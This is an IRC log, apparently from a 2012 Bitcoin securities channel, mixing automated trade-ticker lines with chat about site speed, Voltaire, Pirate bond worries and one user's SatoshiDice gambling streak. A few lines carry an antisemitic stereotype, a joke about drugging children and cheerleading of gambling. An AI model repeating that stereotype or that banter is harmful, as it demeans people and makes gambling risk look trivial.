18:36:07 EmanuelDeOrtego: whats happening with your BITKOIN asset? Aug 21 18:36:08 this one says 5 secs 13 secs, which is about what i see. Aug 21 18:36:44 where is that site based? Aug 21 18:36:47 nefario: The project was proven not to be profitable after I discovered someone else doing the same thing. Aug 21 18:36:56 From: Dulles, VA - IE 8 - DSL Aug 21 18:36:56 Tuesday August 21, 18:35:20 GMT+0300 2012 Aug 21 18:37:11 nefario: I bought all the shares out. I missed 3 but I got them. Aug 21 18:37:15 Have you posted on the forums? Aug 21 18:37:23 Nope. Never had. Heh. Aug 21 18:38:12 I don't keep going forward with something that has a high chance of failure. Aug 21 18:39:07 [GLBSE] [ASICMINER] 9 @ 0.098799 = 0.8892 BTC [+] Aug 21 18:39:08 thats fine Aug 21 18:39:12 just need to communicate it Aug 21 18:39:24 and I think make teh accounts involved public Aug 21 18:39:34 [MPEX] [S.MPOE] 9900 @ 0.00036989 = 3.6619 BTC [-] Aug 21 18:40:01 nefario: I'll be sure to do so in the future. Aug 21 18:41:23 [MPEX] [F.GIGA.ETF] 2000 @ 0.00101111 = 2.0222 BTC [-] Aug 21 18:41:24 [MPEX] [F.GIGA.ETF] 7357 @ 0.00100509 = 7.3944 BTC [-] Aug 21 18:41:28 [GLBSE] [JTME] 5 @ 0.98789 = 4.9395 BTC [-] Aug 21 18:41:30 [GLBSE] [JTME] 1 @ 0.9879 BTC [+] Aug 21 18:41:31 [GLBSE] [JTME] 4 @ 0.99 = 3.96 BTC [+] Aug 21 18:42:17 [GLBSE] [BIF.5-10.MININGBOND] 10 @ 0.25 = 2.5 BTC [+] Aug 21 18:44:57 [GLBSE] [DMC] 1 @ 0.051 BTC [-] Aug 21 18:44:59 [GLBSE] [DMC] 1 @ 0.05 BTC [-] Aug 21 18:44:59 [GLBSE] [DMC] 2 @ 0.0499 = 0.0998 BTC [-] Aug 21 18:45:00 [GLBSE] [DMC] 5 @ 0.04903 = 0.2452 BTC [-] Aug 21 18:45:02 [GLBSE] [DMC] 10 @ 0.049 = 0.49 BTC [-] Aug 21 18:45:03 [GLBSE] [DMC] 1 @ 0.047 BTC [-] Aug 21 18:45:27 [MPEX] [S.MPOE] 32200 @ 0.00036989 = 11.9105 BTC [-] Aug 21 18:45:28 [MPEX] [S.MPOE] 2200 @ 0.00036687 = 0.8071 BTC [-] Aug 21 18:45:30 [MPEX] [S.MPOE] 4075 @ 0.00035661 = 1.4532 BTC [-] Aug 21 18:45:31 [MPEX] [S.MPOE] 21066 @ 0.0003536 = 7.4489 BTC [-] Aug 21 18:45:32 [MPEX] [S.MPOE] 5183 @ 0.00035311 = 1.8302 BTC [-] Aug 21 18:45:33 [MPEX] [S.MPOE] 20600 @ 0.00034965 = 7.2028 BTC [-] Aug 21 18:45:35 [MPEX] [S.MPOE] 14676 @ 0.00034759 = 5.1012 BTC [-] Aug 21 18:46:26 mircea_popescu: how about now, any improvement? Aug 21 18:46:36 [GLBSE] [TYGRR.BOND-PI] 1 @ 1 BTC [+] Aug 21 18:46:50 about 5 seconds Aug 21 18:46:58 hmmm Aug 21 18:47:06 pretty fucking weird Aug 21 18:47:33 clicked on gigamining page. Aug 21 18:47:41 about 15 secs ago still not loaded. Aug 21 18:47:47 it's about 3 secs here in Malaysia Aug 21 18:47:55 now it popped Aug 21 18:47:56 quite an improvement Aug 21 18:48:44 hey MoneyIsDebt is it ever droughty in malaysia ? Aug 21 18:49:10 Nope. Rains almost every day. Aug 21 18:49:15 i gotta get out of here. Aug 21 18:49:15 For about an hour. Aug 21 18:49:21 it hasn't rained since... may ? june ? Aug 21 18:49:39 i think i used 20 tons of water just for keeping the lawn on life support. Aug 21 18:49:50 we don't have gypsies and vampires though Aug 21 18:49:57 so i bring some. Aug 21 18:50:06 see Aug 21 18:50:12 they don;t have cali chicks in romania, i brought some along. Aug 21 18:50:12 international trade makes everyone richer Aug 21 18:50:16 lol Aug 21 18:50:31 yeah I saw that, on your other website Aug 21 18:50:44 i think this could be my middle name Aug 21 18:50:50 Mircea "Your other website" Popescu Aug 21 18:51:03 lol Aug 21 18:51:27 variant of the classic bumpersticker. My other website is 4chan Aug 21 18:51:50 my other stained shirt has bosco on it Aug 21 18:56:17 [MPEX] [F.GIGA.ETF] 3100 @ 0.0010125 = 3.1388 BTC [+] Aug 21 18:56:24 [GLBSE] [TYGRR.BOND-P] 15 @ 0.62 = 9.3 BTC [+] Aug 21 18:56:26 [GLBSE] [TYGRR.BOND-P] 57 @ 0.61 = 34.77 BTC [-] Aug 21 18:56:27 [GLBSE] [GIGAMINING] 6 @ 1.0354 = 6.2124 BTC [+] Aug 21 18:56:27 [GLBSE] [GIGAMINING] 1 @ 1.0355 BTC [+] Aug 21 18:59:19 mircea_popescu: what do you mean by bosco? Aug 21 19:00:00 http://www.boscoworld.com/ Aug 21 19:00:04 you never saw it ?! Aug 21 19:00:27 aha Aug 21 19:01:07 lol Aug 21 19:01:11 usagi: http://youtu.be/eWpjZ3dY2ug Aug 21 19:01:23 near perfect timing Aug 21 19:01:34 we had bosco in Ireland when I was growing up Aug 21 19:02:27 Ireland is so awesome Aug 21 19:02:46 not really Aug 21 19:02:52 i kinda like it. Aug 21 19:02:53 if it was then I'd be there Aug 21 19:02:56 freckles and cute upturned noses Aug 21 19:03:03 http://lambertpuppettheatre.ie/wp-content/uploads/2008/11/bosco.jpg Aug 21 19:03:07 bosco in ireland Aug 21 19:03:16 so not the same thing Aug 21 19:03:17 [GLBSE] [FOO.PPPPT] 1 @ 0.7 BTC [+] Aug 21 19:03:22 a Aug 21 19:03:49 also if you like ireland you must like being unemployed Aug 21 19:04:02 because thats all there is for people not working for the gov Aug 21 19:04:04 i was never employed. Aug 21 19:04:10 nefario: I just like the family-centered culture I hear about on TV Aug 21 19:04:23 but that might be bollocks Aug 21 19:04:30 [GLBSE] [FOO.PPPPT] 2 @ 0.451 = 0.902 BTC [-] Aug 21 19:04:32 [GLBSE] [FOO.PPPPT] 34 @ 0.45 = 15.3 BTC [-] Aug 21 19:04:38 EmanuelDeOrtego: it's mostly bollox Aug 21 19:04:43 it's the same as the UK Aug 21 19:04:51 nevermind then Aug 21 19:05:03 i think belgium is the family centered culture Aug 21 19:05:11 pretty much everyone i know there has likle 3+ kids Aug 21 19:05:20 and they spend most of the day dicking around with them too. Aug 21 19:05:48 Better than "send my kid off to daycare" America Aug 21 19:05:58 maybe. Aug 21 19:06:19 honestly, i don't really like adults who spend a lot of time with kids. it makes them mentally slower and in general quite boring. Aug 21 19:06:41 unless Aug 21 19:06:48 mircea_popescu: hanging out with kids is great, they don't realize how bad the world sucks yet Aug 21 19:06:48 you give the kids lsd Aug 21 19:06:54 then they;re loads of fun Aug 21 19:06:55 ahaha Aug 21 19:07:10 [MPEX] [F.GIGA.ETF] 6443 @ 0.00100509 = 6.4758 BTC [-] Aug 21 19:07:11 [MPEX] [F.GIGA.ETF] 3000 @ 0.00100053 = 3.0016 BTC [-] Aug 21 19:07:13 "any kids left unsupervised will be given one complimentary large espresso and a puppy" Aug 21 19:07:13 [MPEX] [F.GIGA.ETF] 7017 @ 0.00095898 = 6.7292 BTC [-] Aug 21 19:07:15 [GLBSE] [TYGRR.BOND-P] 1 @ 0.605 BTC [-] Aug 21 19:07:16 [GLBSE] [TYGRR.BOND-P] 19 @ 0.6 = 11.4 BTC [-] Aug 21 19:07:18 [GLBSE] [TYGRR.BOND-B] 50 @ 0.1 = 5 BTC [-] Aug 21 19:07:28 BTC-Mining i kinda like the world tbh. Aug 21 19:07:45 me too :) Aug 21 19:07:58 it could be better, but it could also be worse Aug 21 19:08:18 tho, that's the anthropic fallacy, isn't it? Aug 21 19:08:35 it's no fallacy. when i was a kid the entire sysrtem collapsed around me. Aug 21 19:08:39 then i made a lot of money Aug 21 19:08:41 then i retired Aug 21 19:08:43 then i got bored Aug 21 19:08:49 now the entire world is collapsing around me redux Aug 21 19:08:51 what's not to like ? Aug 21 19:09:40 it (like most fallacies) is a fallacy of form, likely the idea behind my statement is correct, but i presented it in a flawed way Aug 21 19:10:24 basically, i said 'the world is good because it is this way' Aug 21 19:10:39 It's called Taoism Aug 21 19:10:42 Welcome. Aug 21 19:10:43 lol Aug 21 19:10:44 such a lame, meaningless statement Aug 21 19:10:46 ever read voltaire btw ? Aug 21 19:10:55 pangloss came up with the ideea i think Aug 21 19:11:03 I need to. Aug 21 19:11:17 voltaire was a contenential, right? Aug 21 19:11:39 http://en.wikipedia.org/wiki/Candide Aug 21 19:11:48 he's one of the pillars of human culture. albeit he was french. Aug 21 19:12:04 I haven't ever been able to make sense of contenental philosophy Aug 21 19:12:17 it's continental you know Aug 21 19:12:24 cause yurp is a continent not a contention Aug 21 19:14:11 anyway, candide is satire. Aug 21 19:14:51 candide is funny for sure Aug 21 19:15:37 ya, not a bad read for a lazy afternoon Aug 21 19:17:06 www.youtube.com/watch?feature=player_detailpage&v=Wp5l-6ZxE6c#t=192s Aug 21 19:18:10 [MPEX] [F.GIGA.ETF] 3600 @ 0.0010125 = 3.645 BTC [+] Aug 21 19:18:18 usagi: I feel like I am in some weird version of Paper Mario. Aug 21 19:31:12 [GLBSE] [DMC] 4 @ 0.052 = 0.208 BTC [+] Aug 21 19:35:28 [GLBSE] [TEEK.B] 4 @ 1.2489 = 4.9956 BTC [+] Aug 21 19:35:42 [GLBSE] [PAJKA.BOND] 5 @ 0.09298999 = 0.4649 BTC [+] Aug 21 19:36:13 [GLBSE] [TEEK.B] 1 @ 1.249 BTC [+] Aug 21 19:36:30 [GLBSE] [DMC] 11 @ 0.052 = 0.572 BTC [+] Aug 21 19:36:41 [GLBSE] [OBSI.HRPT] 2 @ 0.1029 = 0.2058 BTC [+] Aug 21 19:36:47 [GLBSE] [ASICMINER] 1 @ 0.098799 BTC [+] Aug 21 19:37:44 [MPEX] [O.BTCUSD.C100T] 1000 @ 0.06026058 = 60.2606 BTC [+] Aug 21 19:39:46 [GLBSE] [BIF.5-10.MININGBOND] 10 @ 0.299 = 2.99 BTC [+] Aug 21 19:40:17 [MPEX] [S.MPOE] 13700 @ 0.00036511 = 5.002 BTC [+] Aug 21 19:42:49 oh lol, "The Baron's lady weighed about three hundred and fifty pounds, and was therefore a person of great consideration, …" Aug 21 19:43:01 :D Aug 21 19:43:02 hahah Aug 21 19:43:12 i like smickles, he's what you call an inquiring mind. Aug 21 19:43:36 smickles: what? From where did you quote that? Aug 21 19:43:39 well, i want to know Aug 21 19:43:44 candide Aug 21 19:44:01 Ah Aug 21 19:44:39 [GLBSE] [ASICMINER] 7 @ 0.098799 = 0.6916 BTC [+] Aug 21 19:52:16 http://www.youtube.com/watch?v=BdVUSZ_PDd8 Aug 21 19:57:07 [MPEX] [F.GIGA.ETF] 10400 @ 0.00101944 = 10.6022 BTC [+] Aug 21 19:58:35 [MPEX] [S.MPOE] 41536 @ 0.0003701 = 15.3725 BTC [+] Aug 21 19:58:36 [MPEX] [S.MPOE] 56000 @ 0.00037172 = 20.8163 BTC [+] Aug 21 19:58:38 [MPEX] [S.MPOE] 15600 @ 0.00038174 = 5.9551 BTC [+] Aug 21 19:58:39 [MPEX] [S.MPOE] 11864 @ 0.00038179 = 4.5296 BTC [+] Aug 21 20:06:16 [GLBSE] [ASICMINER] 5 @ 0.098799 = 0.494 BTC [+] Aug 21 20:08:22 [MPEX] [S.MPOE] 52717 @ 0.00038179 = 20.1268 BTC [+] Aug 21 20:08:24 [MPEX] [S.MPOE] 25900 @ 0.00038455 = 9.9598 BTC [+] Aug 21 20:08:25 [MPEX] [S.MPOE] 6383 @ 0.00040178 = 2.5646 BTC [+] Aug 21 20:11:01 [MPEX] [O.BTCUSD.P170T] 1 @ 0.87180067 BTC [+] Aug 21 20:11:27 [GLBSE] [JLP-BMD] 1 @ 0.1 BTC [+] Aug 21 20:12:48 [GLBSE] [PPT.B] 3 @ 1.1799 = 3.5397 BTC [+] Aug 21 20:12:50 [GLBSE] [PPT.B] 2 @ 1.1799 = 2.3598 BTC [+] Aug 21 20:14:45 [GLBSE] [TYGRR.BOND-P] 1 @ 0.7 BTC [+] Aug 21 20:14:53 [GLBSE] [GIGAMINING] 1 @ 1.0063 BTC [-] Aug 21 20:14:55 [GLBSE] [GIGAMINING] 4 @ 1.0062 = 4.0248 BTC [-] Aug 21 20:14:56 [GLBSE] [GIGAMINING] 7 @ 1.0061 = 7.0427 BTC [-] Aug 21 20:14:56 [GLBSE] [GIGAMINING] 158 @ 0.961 = 151.838 BTC [-] Aug 21 20:16:03 [GLBSE] [ASICMINER] 5 @ 0.098799 = 0.494 BTC [+] Aug 21 20:16:35 [GLBSE] [OBSI.HRPT] 1 @ 0.1029 BTC [+] Aug 21 20:17:40 [GLBSE] [CPA] 1 @ 0.10097 BTC [-] Aug 21 20:19:45 [GLBSE] [KRAKEN] 4 @ 0.01 = 0.04 BTC Aug 21 20:19:53 WOAH Aug 21 20:20:09 BITCOINMINV has a copy/pasted text from my thread on their website Aug 21 20:20:25 [GLBSE] [OBSI.HRPT] 3 @ 0.1029 = 0.3087 BTC [+] Aug 21 20:20:31 [GLBSE] [BLUECHIP] 7 @ 0.1 = 0.7 BTC Aug 21 20:20:50 [GLBSE] [ASICMINER] 5 @ 0.098799 = 0.494 BTC [+] Aug 21 20:21:10 and on their thread Aug 21 20:23:20 [GLBSE] [ASICMINER] 2 @ 0.098799 = 0.1976 BTC [+] Aug 21 20:31:29 [MPEX] [S.BVPS] 450 @ 0.00370844 = 1.6688 BTC [+] Aug 21 20:32:20 sue them Aug 21 20:32:56 -.- Aug 21 20:32:58 right Aug 21 20:36:51 [GLBSE] [BIB.PIRATE] 50 @ 0.5 = 25 BTC [-] Aug 21 20:38:32 [GLBSE] [FOO.PPPPT] 1 @ 0.5 BTC [+] Aug 21 20:38:33 [GLBSE] [FOO.PPPPT] 16 @ 0.45 = 7.2 BTC [-] Aug 21 20:40:54 [GLBSE] [PPT.A] 5 @ 1.0001 = 5.0005 BTC [-] Aug 21 20:41:16 [GLBSE] [PPT.A] 7 @ 1 = 7 BTC [-] Aug 21 20:41:45 [GLBSE] [DMC] 1 @ 0.0515 BTC [-] Aug 21 20:41:46 [GLBSE] [DMC] 1 @ 0.051 BTC [-] Aug 21 20:41:47 [GLBSE] [DMC] 9 @ 0.047 = 0.423 BTC [-] Aug 21 20:47:59 BTC-Mining sux. Aug 21 20:52:33 it's just your opinion Aug 21 20:52:50 what is ? Aug 21 20:52:59 I find mining very profitable... Aug 21 20:53:08 if you aren't good in doing it then why do you need to tell that it sux? Aug 21 20:53:27 you can say "I am not good in mining" Aug 21 20:53:42 [GLBSE] [GIGAMINING] 10 @ 1 = 10 BTC [+] Aug 21 20:54:44 man. BTC-Mining complained about someone stealing his contract Aug 21 20:54:48 and i said that it sucks Aug 21 20:54:57 as in, not a nice thing, too bad, etc. Aug 21 20:54:58 lol Aug 21 20:55:24 for the record, i never mined, because of either being lazy or not thinking im good at it, whichever you prefer. Aug 21 20:55:27 ah I understood something different.. so I eat back my words Aug 21 20:55:50 it was a bit unclear :) Aug 21 20:56:03 [GLBSE] [OBSI.HRPT] 2 @ 0.1029 = 0.2058 BTC [+] Aug 21 20:56:03 not my fault the guy's name infringes copyright :D Aug 21 20:57:03 is 0.05 high for dmc or low ? i forget Aug 21 20:57:06 !ticker dmc Aug 21 20:57:09 [GLBSE:DMC] [Bid: 0.03500201] [Ask: 0.052] [Spread: 0.01699799] [Last: 0.047] [24hVol: 13.89045002] [7dAvg: 0.04845765] Aug 21 20:57:55 lol mp Aug 21 20:58:01 [GLBSE] [DMC] 5 @ 0.052 = 0.26 BTC [+] Aug 21 20:58:47 [GLBSE] [DMC] 1 @ 0.052 BTC [+] Aug 21 20:59:48 Well, it IPOed at 1 Aug 21 21:00:25 hm Aug 21 21:00:44 i think we should not be using past tense since there are still ipo shares to be bought Aug 21 21:00:51 [GLBSE] [FOO.PPPPT] 2 @ 0.42 = 0.84 BTC [-] Aug 21 21:00:58 Yes Aug 21 21:01:03 IPO != bitcoin IPO :) Aug 21 21:01:07 It's IPOing at 1 Aug 21 21:01:15 :) Aug 21 21:01:33 PPT's are crashing again. Aug 21 21:02:41 Somebody's buying his debt really cheap Aug 21 21:03:25 it's already 42 cents to the dollar ? Aug 21 21:03:30 [GLBSE] [BBBB] 170 @ 0.00028 = 0.0476 BTC [+] Aug 21 21:03:31 this doth not look good at all does it. Aug 21 21:04:25 I think somebody knows Pirate has failed. Aug 21 21:04:33 still no pirate payments…people are getting nervous Aug 21 21:05:08 42 cents on the dollar is pretty good Aug 21 21:05:13 i'm staying out of that game - i don't know either way Aug 21 21:05:18 People are getting desperate Aug 21 21:05:42 haha Aug 21 21:05:51 no reason for panic? hmm i better panic! Aug 21 21:06:22 heh Aug 21 21:06:26 someone wanted some bitvps shares Aug 21 21:06:28 !ticker s.bvps Aug 21 21:06:29 [MPEX:S.BVPS] 1day: 0.00363919 / 0.00368828 / 0.00370844 (1721 shares, 6.35 BTC), 30day: 0.001175 / 0.00314513 / 0.00435 (86399 shares, 271.74 BTC) Aug 21 21:07:55 i think its interesting everyone wants to invest in satoshidice Aug 21 21:08:05 as even their webste says they pay out 99% of profit Aug 21 21:08:23 not that many real revenue streams in btc. Aug 21 21:08:38 sooner or later people will realise the value of revenue stream in deflationary currency. Aug 21 21:08:45 [GLBSE] [ASICMINER] 155 @ 0.098799 = 15.3138 BTC [+] Aug 21 21:10:00 yea yeah Aug 21 21:10:09 big words Aug 21 21:10:17 https://bitcointalk.org/index.php?topic=102299.0 Aug 21 21:11:03 good drama ? Aug 21 21:11:23 i give him a scammer tag. Aug 21 21:11:28 id Aug 21 21:11:44 well known dollar auction Aug 21 21:11:47 .g dollar auction Aug 21 21:11:48 mircea_popescu: http://en.wikipedia.org/wiki/Dollar_auction Aug 21 21:11:53 need to change back keyboard Aug 21 21:12:07 spilled one yesterday with Coke™ Aug 21 21:12:30 [GLBSE] [OBSI.HRPT] 1 @ 0.1029 BTC [+] Aug 21 21:14:41 [GLBSE] [OBSI.HRPT] 83 @ 0.1029 = 8.5407 BTC [+] Aug 21 21:19:41 [GLBSE] [FUTUREFUND] 136 @ 0.0001195 = 0.0163 BTC [+] Aug 21 21:20:05 [GLBSE] [TYGRR.BOND-P] 2 @ 0.65 = 1.3 BTC [-] Aug 21 21:20:25 [MPEX] [S.MPOE] 2107 @ 0.00036511 = 0.7693 BTC [-] Aug 21 21:20:28 [GLBSE] [GIGAMINING] 1 @ 1.03539 BTC [+] Aug 21 21:27:15 wtf time of the day is "the 28th Eastern time." Aug 21 21:27:58 He means when the clock strikes midnight Aug 21 21:28:01 Eastern Aug 21 21:28:09 [GLBSE] [BDK.BND] 5 @ 0.101 = 0.505 BTC [-] Aug 21 21:28:26 teh world famous jackrabbit slim's eastern midnight! Aug 21 21:29:19 lol he just fixed it too Aug 21 21:29:29 Coincomm, are you here? Aug 21 21:29:38 [GLBSE] [KRAKEN] 6 @ 0.01 = 0.06 BTC Aug 21 21:35:08 lol Aug 21 21:35:11 hey satoshidice Aug 21 21:35:15 thanks for the 20 btc Aug 21 21:35:43 ahaha nowai ? Aug 21 21:35:50 yep Aug 21 21:35:53 lol wd. Aug 21 21:35:59 [GLBSE] [RSM] 8 @ 0.26 = 2.08 BTC [+] Aug 21 21:36:00 total luck Aug 21 21:36:01 obviously Aug 21 21:36:08 skill baby Aug 21 21:36:13 do it with 2000 nao Aug 21 21:36:16 i just did the same bet 4 times in a row Aug 21 21:36:25 3 minutes spaced between Aug 21 21:36:26 lol Aug 21 21:36:54 what's with the less than 1 Aug 21 21:36:56 that never happens.. Aug 21 21:37:01 0 ? Aug 21 21:38:50 [GLBSE] [BIF-AG-INDEX] 17 @ 0.175 = 2.975 BTC [+] Aug 21 21:42:02 "amount" : 8.01489200, Aug 21 21:42:04 lol ok ill take that Aug 21 21:42:06 thanks SD Aug 21 21:42:39 dude srsly. Aug 21 21:42:40 stop! Aug 21 21:42:44 while you're ahead. Aug 21 21:43:25 http://www.youtube.com/watch?v=67EaMezOKUw Aug 21 21:44:34 sadly Aug 21 21:44:38 i made more in 15 minutes on SD Aug 21 21:44:42 than i did with my litecoin deposit Aug 21 21:44:44 for the whole week Aug 21 21:44:45 ;< Aug 21 21:44:47 lol Aug 21 21:44:55 well Aug 21 21:44:56 almost Aug 21 21:44:59 now you can buy their shares Aug 21 21:45:01 ... really almost Aug 21 21:45:01 [GLBSE] [TYGRR.BOND-P] 1 @ 0.76699999 BTC [+] Aug 21 21:45:04 and make a cut of all ulterior suckers. Aug 21 21:45:05 yeah right Aug 21 21:45:08 have you seen the buys listed? Aug 21 21:45:13 theres thousands of BTC Aug 21 21:45:29 so ? Aug 21 21:45:34 the total sold is like 30k Aug 21 21:46:25 Well, I made a bet on that dollar auction. Aug 21 21:46:35 I might win considering Bitcointalk isn't super retarded Aug 21 21:46:36 "amount" : 2.00334800, Aug 21 21:46:38 won again Aug 21 21:46:47 dude srlsy. Aug 21 21:46:53 somebody walk over to rg and smack him Aug 21 21:47:01 pff Aug 21 21:47:04 i just made hundreds of dollars Aug 21 21:47:09 betting 1 BTC Aug 21 21:47:11 gimmie a break Aug 21 21:48:53 SatoshiDice? Aug 21 21:49:04 You're kidding me. Aug 21 21:49:13 [GLBSE] [PPT.A] 10 @ 1.18 = 11.8 BTC [+] Aug 21 21:49:41 "amount" : 2.00334800, Aug 21 21:49:42 AGAIN Aug 21 21:49:42 rg: the laws of probability say that if you keep trying, you'll lose it all again :) that's how casinos are made of gold and shit like that Aug 21 21:49:42 hahaha Aug 21 21:49:56 copumpkin will he listen ? no he won't listen Aug 21 21:50:07 rg is on a god given quest to suffer from all possible addictions Aug 21 21:50:17 rg will eventually bet all of BitVPS on SatoshiDice Aug 21 21:50:22 and Evoorhees will own it Aug 21 21:50:43 merger! /me fees. Aug 21 21:51:16 [GLBSE] [PPT.B] 20 @ 1.1799 = 23.598 BTC [+] Aug 21 21:51:20 Evoorhees looks Jewish so I would trust that guy with anything. Aug 21 21:51:22 yeah im going to lose bitvps by losing 1 btc Aug 21 21:51:26 right.. Aug 21 21:51:31 do it enough times... Aug 21 21:51:33 minus the other 35 btc i earned Aug 21 21:51:36 dude Aug 21 21:51:38 do you understand Aug 21 21:51:40 i havent lost once Aug 21 21:51:44 rg, you're doing it right Aug 21 21:51:50 no rg we are incomprehensiblified. Aug 21 21:51:57 EmanuelDeOrtego do i look like a jew ? Aug 21 21:52:01 He's not even betting all of his winnings. Aug 21 21:52:06 EmanuelDeOrtego: the only proper way to win Aug 21 21:52:09 is to play one day Aug 21 21:52:11 then never EVER Aug 21 21:52:13 play again Aug 21 21:52:21 rg gets it Aug 21 21:52:26 He doesn't need to be parented Aug 21 21:52:44 i just do it cause he's cute when he gets ruffled. Aug 21 21:53:00 dont know much about history Aug 21 21:53:04 dont know much about biology Aug 21 21:53:07 dont know much about science book Aug 21 21:53:11 dont know much about the french i took Aug 21 21:53:14 but i do know that i love you Aug 21 21:53:20 and i know that if yuo love me so Aug 21 21:53:37 okkkkaaayyyy Aug 21 21:53:40 I know that rg likes singing Aug 21 21:54:05 ok this is the last time im betting Aug 21 21:54:08 i better lose this bet Aug 21 21:54:13 then ill feel better Aug 21 21:54:20 250 ftw Aug 21 21:54:23 ROTF Aug 21 21:54:24 won Aug 21 21:54:35 he;'s gonna ruin my fucken ipo Aug 21 21:54:38 Somebody else lost though Aug 21 21:54:42 sd goes bkrupt by friday Aug 21 21:54:48 mircea_popescu: haha Aug 21 21:54:55 fluke gives rg 3000 btc Aug 21 21:55:03 i would probbaly give half of it back Aug 21 21:55:04 SatoshiDice was losing money at one point. Aug 21 21:55:11 if there was a fluke Aug 21 21:55:47 Are you talking about that woman who thinks not being entitled to birth control is a war against women? Aug 21 21:55:55 EmanuelDeOrtego they could in principle lose the house, who's to say someone doesn't get lucky on the 64k x thing 18 million times in a row Aug 21 21:56:10 but the chances Aug 21 21:56:13 are so small Aug 21 21:56:15 im pretty 100% sure Aug 21 21:56:15 kinda low ya Aug 21 21:56:18 there are bots doing satoshidice Aug 21 21:56:23 why ? Aug 21 21:56:25 doing penny bets Aug 21 21:56:27 Nah, you think? Aug 21 21:56:29 rg you see robots everywhere Aug 21 21:56:31 fetishist Aug 21 21:56:33 i wonder how much they wion Aug 21 21:56:34 win* Aug 21 21:56:35 if anything Aug 21 21:56:39 theres no formula Aug 21 21:56:47 rg, they were ruining SatoshiDice at one point. Aug 21 21:56:54 oh Aug 21 21:56:56 Evorhees had to raise the house advantage. Aug 21 21:56:59 then they changed the % Aug 21 21:57:25 lmao so now the forum people are hating on DeaDTerra for making them a passthrough Aug 21 21:57:36 in the end they'd hate on tarantino if he brought them naked uma thurman Aug 21 21:57:40 cause her nail color Aug 21 21:58:41 [MPEX] [S.MPOE] 48500 @ 0.00036695 = 17.7971 BTC [+] Aug 21 21:58:41 [MPEX] [S.MPOE] 3000 @ 0.00036511 = 1.0953 BTC [-] Aug 21 21:58:43 [GLBSE] [TYGRR.BOND-P] 30 @ 0.61000001 = 18.3 BTC [-] Aug 21 21:58:49 url to hating? Aug 21 21:59:17 [GLBSE] [FOO.PPPPT] 4 @ 0.524 = 2.096 BTC [+] Aug 21 21:59:18 [GLBSE] [FOO.PPPPT] 1 @ 0.525 BTC [+] Aug 21 22:00:12 https://bitcointalk.org/index.php?topic=101902.msg1120714#msg1120714 and before Aug 21 22:00:39 oh nice loks like satoshidice is finally diversifying Aug 21 22:00:42 they have a new kind of game Aug 21 22:00:44 that's good Aug 21 22:01:02 [MPEX] [O.BTCUSD.P170N] 1 @ 0.95202152 BTC [+] Aug 21 22:01:12 that progressive thing ? Aug 21 22:01:59 [GLBSE] [CIUCIU.BOND] 1 @ 0.1 BTC [+] Aug 21 22:02:09 yeah Aug 21 22:02:12 it has crazy low odds Aug 21 22:02:20 [MPEX] [F.GIGA.ETF] 1600 @ 0.00101944 = 1.6311 BTC [+] Aug 21 22:02:22 [MPEX] [F.GIGA.ETF] 2000 @ 0.00102458 = 2.0492 BTC [+] Aug 21 22:02:39 # Win Odds: 0.06184% Aug 21 22:03:32 So if anyone won the 64,000x bet Aug 21 22:03:36 SatoshiDice would bust Aug 21 22:03:47 there's a max Aug 21 22:03:53 [GLBSE] [TYGRR.BOND-P] 26 @ 0.61000001 = 15.86 BTC [-] Aug 21 22:03:54 they'd be out what, 650 btc ? Aug 21 22:03:58 oh Aug 21 22:04:04 Well, that's less meaningful Aug 21 22:04:18 250 Aug 21 22:04:26 ern o Aug 21 22:04:29 you're talking about something else Aug 21 22:04:43 .py 0.050 * 64000 Aug 21 22:04:44 3200.0 Aug 21 22:04:50 3.2k a fair chunk Aug 21 22:05:01 [GLBSE] [TYGRR.BOND-P] 5 @ 0.61000001 = 3.05 BTC [-] Aug 21 22:05:03 aactually... 1% of the comp. Aug 21 22:05:15 [GLBSE] [JLP-BMD] 1 @ 0.0999 BTC [-] Aug 21 22:06:39 "category" : "receive", Aug 21 22:06:40 "amount" : 4.00719600, Aug 21 22:06:47 why... cant i lose? Aug 21 22:06:59 [GLBSE] [TYGRR.BOND-P] 1 @ 0.61000002 BTC [+] Aug 21 22:07:01 variance Aug 21 22:07:01 [GLBSE] [TYGRR.BOND-P] 24 @ 0.61000001 = 14.64 BTC [-] Aug 21 22:07:24 [MPEX] [S.MPOE] 9500 @ 0.00037725 = 3.5839 BTC [+] Aug 21 22:07:25 [MPEX] [S.MPOE] 19800 @ 0.00036511 = 7.2292 BTC [-] Aug 21 22:07:36 lol how much are you up ? Aug 21 22:07:49 [GLBSE] [FOO.PPPPT] 1 @ 0.55 BTC [+] Aug 21 22:07:54 30.69 btc Aug 21 22:07:59 so you did lose some Aug 21 22:08:02 [GLBSE] [OBSI.HRPT] 6 @ 0.1037 = 0.6222 BTC [+] Aug 21 22:08:04 no Aug 21 22:08:07 i counted wrong the first tmie Aug 21 22:08:11 weren't you 35 a Aug 21 22:08:16 i was including a transaction that wasnt satoshidice Aug 21 22:08:26 they all look similar Aug 21 22:08:49 [MPEX] [S.MPOE] 19103 @ 0.00036511 = 6.9747 BTC [-] Aug 21 22:09:03 [MPEX] [S.MPOE] 2970 @ 0.00035701 = 1.0603 BTC [-] Aug 21 22:09:05 [MPEX] [S.MPOE] 7000 @ 0.00038269 = 2.6788 BTC [+] Aug 21 22:09:06 [MPEX] [S.MPOE] 10030 @ 0.00039262 = 3.938 BTC [+] Aug 21 22:10:14 [GLBSE] [NYAN.C] 2 @ 0.8499 = 1.6998 BTC [+] Aug 21 22:10:21 slol someone bid 15 btc Aug 21 22:10:23 in one bid Aug 21 22:10:26 damn that's insane Aug 21 22:10:30 ;;calc 15 * [ticker --last] Aug 21 22:10:32 150.7515 Aug 21 22:10:38 to lose 150.75 in one bet Aug 21 22:10:45 [GLBSE] [NYAN.B] 1 @ 1 BTC [-] Aug 21 22:10:46 glad i dont have the guts for that Aug 21 22:10:59 rg, that was likely a bot Aug 21 22:11:05 that intends to make it back Aug 21 22:11:06 they actully won Aug 21 22:11:23 bid 15 btc, got 20 back Aug 21 22:11:37 [GLBSE] [NYAN.C] 2 @ 0.8989 = 1.7978 BTC [+] Aug 21 22:11:38 [GLBSE] [NYAN.C] 1 @ 0.8999 BTC [+] Aug 21 22:11:40 [GLBSE] [NYAN.C] 19 @ 0.9 = 17.1 BTC [+] Aug 21 22:11:50 just seems silly to me Aug 21 22:11:52 to risk that much Aug 21 22:12:57 [GLBSE] [BITBOND] 4 @ 0.399 = 1.596 BTC [-] Aug 21 22:15:44 [GLBSE] [OBSI.HRPT] 9 @ 0.1037 = 0.9333 BTC [+] Aug 21 22:17:02 [GLBSE] [PUREMINING] 1 @ 0.13898 BTC [-] Aug 21 22:18:20 What does nyanc do now that pirate is gone Aug 21 22:18:22 Some lost 250 